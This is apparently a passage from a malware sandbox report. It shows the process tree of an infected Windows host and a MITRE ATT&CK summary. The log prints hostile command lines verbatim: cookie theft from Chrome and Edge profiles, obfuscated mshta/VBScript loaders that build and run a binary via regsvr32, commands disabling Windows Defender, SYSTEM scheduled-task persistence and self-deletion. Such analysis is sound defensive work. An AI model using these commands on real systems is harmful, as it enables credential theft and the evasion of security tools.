                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4148
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4104
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4936
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                          4⤵
                                                                                            PID:4272
                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            4⤵
                                                                                              PID:5612
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5664
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5280
                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5348
                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks whether UAC is enabled
                                                                                            • Drops file in Program Files directory
                                                                                            PID:4744
                                                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4704
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3728
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5328
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              4⤵
                                                                                                PID:3620
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                4⤵
                                                                                                  PID:4312
                                                                                            • C:\Users\Admin\Documents\qnu6RoOHN94_bxm4NBRTQayP.exe
                                                                                              "C:\Users\Admin\Documents\qnu6RoOHN94_bxm4NBRTQayP.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:4340
                                                                                              • C:\Users\Admin\Documents\qnu6RoOHN94_bxm4NBRTQayP.exe
                                                                                                "{path}"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4640
                                                                                            • C:\Users\Admin\Documents\QuefCW3aeQ8kA1PPhZ2R64EJ.exe
                                                                                              "C:\Users\Admin\Documents\QuefCW3aeQ8kA1PPhZ2R64EJ.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4108
                                                                                              • C:\Users\Admin\Documents\QuefCW3aeQ8kA1PPhZ2R64EJ.exe
                                                                                                "C:\Users\Admin\Documents\QuefCW3aeQ8kA1PPhZ2R64EJ.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:5788
                                                                                            • C:\Users\Admin\Documents\AwZ3WTKp2BI4LSqk4ixDS3n6.exe
                                                                                              "C:\Users\Admin\Documents\AwZ3WTKp2BI4LSqk4ixDS3n6.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks processor information in registry
                                                                                              PID:4444
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im AwZ3WTKp2BI4LSqk4ixDS3n6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\AwZ3WTKp2BI4LSqk4ixDS3n6.exe" & del C:\ProgramData\*.dll & exit
                                                                                                3⤵
                                                                                                  PID:4296
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im AwZ3WTKp2BI4LSqk4ixDS3n6.exe /f
                                                                                                    4⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:5400
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /t 6
                                                                                                    4⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:5968
                                                                                              • C:\Users\Admin\Documents\5cKKzdI9KUBiKfIGDdsMiFM5.exe
                                                                                                "C:\Users\Admin\Documents\5cKKzdI9KUBiKfIGDdsMiFM5.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:4828
                                                                                                • C:\Users\Admin\Documents\5cKKzdI9KUBiKfIGDdsMiFM5.exe
                                                                                                  "{path}"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks processor information in registry
                                                                                                  PID:5836
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 5cKKzdI9KUBiKfIGDdsMiFM5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5cKKzdI9KUBiKfIGDdsMiFM5.exe" & del C:\ProgramData\*.dll & exit
                                                                                                    4⤵
                                                                                                      PID:5000
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im 5cKKzdI9KUBiKfIGDdsMiFM5.exe /f
                                                                                                        5⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:4296
                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                        timeout /t 6
                                                                                                        5⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:2256
                                                                                                • C:\Users\Admin\Documents\lZgseG8QlQsYapsk14aIAHoJ.exe
                                                                                                  "C:\Users\Admin\Documents\lZgseG8QlQsYapsk14aIAHoJ.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4504
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 660
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:4552
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 676
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:4520
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 664
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:4752
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 632
                                                                                                    3⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Program crash
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:2812
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 764
                                                                                                    3⤵
                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                    • Program crash
                                                                                                    PID:4348
                                                                                                • C:\Users\Admin\Documents\T5DYqOnKwApX2Zuuxs9HLxVx.exe
                                                                                                  "C:\Users\Admin\Documents\T5DYqOnKwApX2Zuuxs9HLxVx.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4248
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 660
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:3728
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 676
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:4360
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 632
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:2180
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 692
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:4748
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 1084
                                                                                                    3⤵
                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                    • Program crash
                                                                                                    PID:4892
                                                                                                • C:\Users\Admin\Documents\StpKldNxi7nnEMnxYLjpwdNK.exe
                                                                                                  "C:\Users\Admin\Documents\StpKldNxi7nnEMnxYLjpwdNK.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4860
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3156
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5320
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                      PID:3764
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      3⤵
                                                                                                        PID:5100
                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                    1⤵
                                                                                                    • Process spawned unexpected child process
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4236
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:4256
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4F64.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\4F64.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4324
                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                    1⤵
                                                                                                    • Process spawned unexpected child process
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4364
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Modifies registry class
                                                                                                      PID:2368
                                                                                                  • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                    C:\Windows\servicing\TrustedInstaller.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5256
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                    1⤵
                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                    PID:5660
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5604
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\32DF.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\32DF.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4716
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\A7F1.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\A7F1.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:4776
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1802.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\1802.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:4380
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                    1⤵
                                                                                                      PID:5756
                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                      1⤵
                                                                                                        PID:3260
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7A18.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7A18.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:4864
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8729.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\8729.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:5508
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\90DE.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\90DE.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2344
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9AD2.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\9AD2.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5592
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DA6C.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\DA6C.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in Windows directory
                                                                                                        PID:4352
                                                                                                        • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                          2⤵
                                                                                                            PID:5276
                                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                            schtasks /create /sc minute /ED "12/12/2022" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:4136
                                                                                                          • C:\Windows\System\svchost.exe
                                                                                                            "C:\Windows\System\svchost.exe" formal
                                                                                                            2⤵
                                                                                                            • Drops file in Windows directory
                                                                                                            PID:5344
                                                                                                            • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                              "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                              3⤵
                                                                                                                PID:4296
                                                                                                              • C:\Windows\System\spoolsv.exe
                                                                                                                "C:\Windows\System\spoolsv.exe" --MaxCircuitDirtiness 60 --NewCircuitPeriod 1 --MaxClientCircuitsPending 1024 --OptimisticData 1 --KeepalivePeriod 30 --CircuitBuildTimeout 10 --EnforceDistinctSubnets 0 --HardwareAccel 1 --UseEntryGuards 0
                                                                                                                3⤵
                                                                                                                  PID:3224
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:4544
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:6104
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:1720
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:4424
                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                      1⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Drops file in System32 directory
                                                                                                                      PID:4360
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\EAF8.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\EAF8.exe
                                                                                                                      1⤵
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:6076
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      C:\Windows\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:5232
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:4828
                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                          C:\Windows\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:4536
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:6020
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4CEF.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4CEF.exe
                                                                                                                              1⤵
                                                                                                                                PID:5696
                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                  "C:\Windows\System32\mshta.exe" vbSCRIPt: cLOSE ( cREATeoBJECt ("WSCRiPt.SHELl" ). RUn ( "CmD /C tyPE ""C:\Users\Admin\AppData\Local\Temp\4CEF.exe"" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF """" == """" for %u in (""C:\Users\Admin\AppData\Local\Temp\4CEF.exe"" ) do taskkill /IM ""%~nxu"" -F " ,0 ,trUe ) )
                                                                                                                                  2⤵
                                                                                                                                    PID:3500
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\Temp\4CEF.exe" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF "" == "" for %u in ("C:\Users\Admin\AppData\Local\Temp\4CEF.exe" ) do taskkill /IM "%~nxu" -F
                                                                                                                                      3⤵
                                                                                                                                        PID:2172
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE
                                                                                                                                          ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ
                                                                                                                                          4⤵
                                                                                                                                            PID:5728
                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              "C:\Windows\System32\mshta.exe" vbSCRIPt: cLOSE ( cREATeoBJECt ("WSCRiPt.SHELl" ). RUn ( "CmD /C tyPE ""C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE"" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF ""/P_Y8a5JuWcFqIugTe3zu0e0JtIZJ "" == """" for %u in (""C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE"" ) do taskkill /IM ""%~nxu"" -F " ,0 ,trUe ) )
                                                                                                                                              5⤵
                                                                                                                                                PID:5616
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF "/P_Y8a5JuWcFqIugTe3zu0e0JtIZJ " == "" for %u in ("C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE" ) do taskkill /IM "%~nxu" -F
                                                                                                                                                  6⤵
                                                                                                                                                    PID:5688
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbScriPt: CLosE ( CReATEoBJECT ( "WScRiPT.shelL" ). RUN ( "C:\Windows\system32\cmd.exe /q /c echo raH5C%RANdOm%S5SL8> EB_HYL.2J & EchO | SEt /P = ""MZ"" > c2Y3YxsZ.M9Z & coPy /B /y C2Y3YxsZ.m9Z + yWVx3x_.3UY + 6_P_Y4.PCT + dO~RV5TB.TuG + CAKMOv5L.OJ + ZOWCN.08 + G~EBG.A + EB_HyL.2J ..\BKZz.P & StArt regsvr32 ..\BkZz.p /u -S & Del /Q * " , 0 , tRUE ) )
                                                                                                                                                  5⤵
                                                                                                                                                    PID:412
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe" /q /c echo raH5C%RANdOm%S5SL8> EB_HYL.2J & EchO | SEt /P = "MZ" >c2Y3YxsZ.M9Z & coPy /B /y C2Y3YxsZ.m9Z + yWVx3x_.3UY + 6_P_Y4.PCT + dO~RV5TB.TuG + CAKMOv5L.OJ + ZOWCN.08 + G~EBG.A +EB_HyL.2J ..\BKZz.P & StArt regsvr32 ..\BkZz.p /u -S & Del /Q *
                                                                                                                                                      6⤵
                                                                                                                                                        PID:4172
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" EchO "
                                                                                                                                                          7⤵
                                                                                                                                                            PID:3768
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>c2Y3YxsZ.M9Z"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5048
                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              regsvr32 ..\BkZz.p /u -S
                                                                                                                                                              7⤵
                                                                                                                                                                PID:4680
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /IM "4CEF.exe" -F
                                                                                                                                                          4⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:4868
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4DDA.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\4DDA.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    PID:5924
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im 4DDA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4DDA.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3156
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /im 4DDA.exe /f
                                                                                                                                                          3⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:4716
                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                          timeout /t 6
                                                                                                                                                          3⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:4864
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4F81.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4F81.exe
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      PID:5864
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4F81.exe
                                                                                                                                                        "{path}"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4188
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5968
                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4000
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1CCD.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1CCD.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:3156

                                                                                                                                                            Network

                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                            Execution

                                                                                                                                                            Scheduled Task

                                                                                                                                                            1
                                                                                                                                                            T1053

                                                                                                                                                            Persistence

                                                                                                                                                            Modify Existing Service

                                                                                                                                                            1
                                                                                                                                                            T1031

                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                            2
                                                                                                                                                            T1060

                                                                                                                                                            Scheduled Task

                                                                                                                                                            1
                                                                                                                                                            T1053

                                                                                                                                                            BITS Jobs

                                                                                                                                                            1
                                                                                                                                                            T1197

                                                                                                                                                            Privilege Escalation

                                                                                                                                                            Scheduled Task

                                                                                                                                                            1
                                                                                                                                                            T1053

                                                                                                                                                            Defense Evasion

                                                                                                                                                            Modify Registry

                                                                                                                                                            5
                                                                                                                                                            T1112

                                                                                                                                                            Disabling Security Tools

                                                                                                                                                            3
                                                                                                                                                            T1089

                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                            1
                                                                                                                                                            T1497

                                                                                                                                                            BITS Jobs

                                                                                                                                                            1
                                                                                                                                                            T1197

                                                                                                                                                            Install Root Certificate

                                                                                                                                                            1
                                                                                                                                                            T1130

                                                                                                                                                            Credential Access

                                                                                                                                                            Credentials in Files

                                                                                                                                                            3
                                                                                                                                                            T1081

                                                                                                                                                            Discovery

                                                                                                                                                            Query Registry

                                                                                                                                                            6
                                                                                                                                                            T1012

                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                            1
                                                                                                                                                            T1497

